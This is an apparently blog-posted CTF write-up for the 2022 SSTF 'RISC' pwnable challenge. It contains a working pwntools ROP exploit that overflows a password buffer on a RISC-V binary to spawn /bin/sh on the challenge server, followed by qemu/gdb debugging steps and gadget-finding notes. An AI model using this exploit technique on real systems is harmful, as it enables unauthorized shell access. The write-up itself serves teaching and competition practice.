CTF
2022 SSTF CTF (Hacker's Playground) RISC Pwnable Write-Up
JUNFUTURE
2022. 9. 6. 20:20
from pwn import *
def slog(n, m): return success(": ".join([n, hex(m)]))
context.log_level = 'debug'
# p = process(['./qemu-riscv64','-g','9988','./target'])
# p = process(['./qemu-riscv64','./target'])
p = remote('riscy.sstf.site', 18223)
get_a7 = 0x2b568
ecall_ret = 0x3b8c4
binsh = 0x6ecaf
payload = b'250382'
payload += b'\x00'
payload += b'B'*(32-len(payload))
payload += p64(0x6eccf) #s0 #write_table
payload += p64(0x0000000000010448) #first_ret in start #$sp-48
# read in main to 0x6eccf
# a0 0x0 0
# a1 0x6ec9f 453791
# a2 0x100 256
# insert bss(0x6ec9f) 0x0000000000026156
payload += b'D'*32
payload += p64(0x6eccf+0x10) #s0 'flag'
payload += p64(0x0000000000010448) #second_ret in start
payload += b'D'*32
payload += b'B'*8 #s0
payload += p64(0x0000000000010A68) #third_ret in start
#ra -> 0x10a68
#s0 -> B
#### csu chaining in 0x10a68 ####
payload += b'D'*16 #s5
payload += p64(ecall_ret) #s4 -> size -> a2
payload += p64(0) #s3 -> buf -> a1
payload += p64(binsh) #s2 -> fd -> a0
payload += p64(0x4444444444444444-1) #s1 -> func
payload += p64(0x6ec9f) #s0 -> func
payload += p64(0x0000000000010A22) #jump
#### setting a7 ####
payload += b'A'*8 #s0
payload += p64(0) #a1
payload += p64(binsh) #a0
payload += p64(0xdd) #a7
# pause()
p.sendafter('Password:',payload)
p.sendafter('Password:',p64(get_a7)) #open // write
# (gdb) x/10x 0x6ec9f
# 0x6ec9f <static_slotinfo+15>: 0x56 0x61 0x02 0x00 0x00 0x00 0x00 0x00
# 0x6eca7 <static_slotinfo+23>: 0x00 0x00
p.sendafter('Password:','/bin/sh\x00')
p.interactive()
- csu chaining
- using the RISC-V syscall routine
- finding gadgets for a new ISA
1. qemu-riscv64 -g (desired port) ./target
./qemu-riscv64 -g 9999 ./target
2. Open another terminal
3. gdb-multiarch (pwndbg does not work well here)
(gdb) target remote localhost:(the port you opened)
target remote localhost:9999
(gdb) set arch riscv:rv64
The target architecture is assumed to be riscv:rv64
(gdb) file ./target
Reading symbols from ./target...
(No debugging symbols found in ./target)
4. Done
(gdb) disassemble start
Dump of assembler code for function start:
0x0000000000010434 <+0>: addi sp,sp,-48
0x0000000000010436 <+2>: sd ra,40(sp)
0x0000000000010438 <+4>: sd s0,32(sp)
0x000000000001043a <+6>: addi s0,sp,48
0x000000000001043c <+8>: lui a5,0x4c
0x0000000000010440 <+12>: addi a0,a5,656 # 0x4c290
0x0000000000010444 <+16>: jal ra,0x1aa04 <puts>
0x0000000000010448 <+20>: lui a5,0x4c
0x000000000001044c <+24>: addi a0,a5,680 # 0x4c2a8
0x0000000000010450 <+28>: jal ra,0x14f34 <printf>
0x0000000000010454 <+32>: addi a5,s0,-48
0x0000000000010458 <+36>: li a2,32
0x000000000001045c <+40>: li a1,0
0x000000000001045e <+42>: mv a0,a5
5. Finding gadgets
./xrop ../sstf2022/riscy_4d8eea5aee06d1a109c05a7b1d33e06b/release/deploy/qemu-riscv64 target
This did not work well, though => use objdump instead
Reference: [ROP] how to find gadgets, https://dokhakdubini.tistory.com/51